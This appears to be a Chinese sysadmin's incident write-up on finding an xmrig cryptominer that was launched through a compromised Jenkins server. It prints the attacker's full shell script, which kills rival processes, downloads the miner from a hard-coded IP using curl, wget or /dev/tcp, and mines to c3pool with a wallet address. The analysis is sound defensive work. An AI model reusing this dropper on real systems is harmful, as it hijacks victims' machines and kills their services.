linux异常进程问题排查
-
有反馈网站访问缓慢,发现有进程占用大量资源
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 29575 root 10 -10 2951860 2.0g 1960 S 183.4 26.7 10943:12 trace -
查找消耗资源的进程
指令:
ps -f -p 29575结果:
[root@localhost ~]# ps -f -p 29575 UID PID PPID C STIME TTY TIME CMD root 29575 29554 99 11月24 ? 7-12:44:20 ./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 100 --cpu-priority 3 --print-time 25 --threads 2 --url auto.c3pool.org:13333 --user 83dxgsjgbnM看到这个配置就知道它不是好东西
--max-cpu-usage 100 -
查找父进程
ps -f -p 29554[root@localhost ~]# ps -f -p 29554 UID PID PPID C STIME TTY TIME CMD root 29554 32494 0 11月24 ? 00:00:00 /bin/bash /tmp/jenkins1137544342535481679.sh [root@localhost ~]# ps -f -p 32494 UID PID PPID C STIME TTY TIME CMD root 32494 1 0 11月24 ? 00:19:04 java -jar /usr/local/jenkins.war --httpPort=8083 -
了解脚本
-
cat /tmp/jenkins1137544342535481679.sh#!/bin/bash ps aux | grep -v grep | grep -v "java\|redis\|weblogic\|mongod\|mysql\|oracle\|b52e75408\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh"| awk "{if($3>60.0) print $2}" | xargs -I % kill -9 % if [[ $(whoami) != "root" ]]; then for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do kill -9 $tr || : ; done; fi threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1); hostHash=$(hostname -f | md5sum | cut -c1-8); echo "${hostHash} - ${threadCount}"; _curl () { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- } rm -rf config.json; d () { curl -L --insecure --connect-timeout 5 --max-time 40 --fail $1 -o $2 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 $1 -O $2 2> /dev/null || _curl $1 > $2; } test ! -s trace && \ d http://118.189.172.141:8080/novoCRM/static/xmrig-6.4.0-linux-x64.tar.gz trace.tgz && \ tar -zxvf trace.tgz && \ mv xmrig-6.4.0/xmrig trace && \ rm -rf xmrig-6.4.0 && \ rm -rf trace.tgz; test ! -x trace && chmod +x trace; k() { ./trace \ -r 2 \ -R 2 \ --keepalive \ --no-color \ --donate-level 1 \ --max-cpu-usage 100 \ --cpu-priority 3 \ --print-time 25 \ --threads ${threadCount:-4} \ --url $1 \ --user 83dxgsjgbnMN7Ej6GfCZMsfHYD3NYdozAhm7DjyTme6jTYPaJ8AQeEyMGKLRL1LjqXVSVBJgU3moYUECZjWUAkTi8rxSNZW \ --pass elf2 \ --keepalive } k auto.c3pool.org:13333 -
脚本中有一个trace命令是核心,它是消耗服务器资源的罪魁祸首,通过
lsof -p 29554找到它所在目录/root/.jenkins/workspace/UpdateJenkins
-
-
处理方案:
- 停止该进程,删除问题脚本/tmp/jenkins1137544342535481679.sh
- 重新从官方下载jenkins.war
- 持续跟踪
- revenge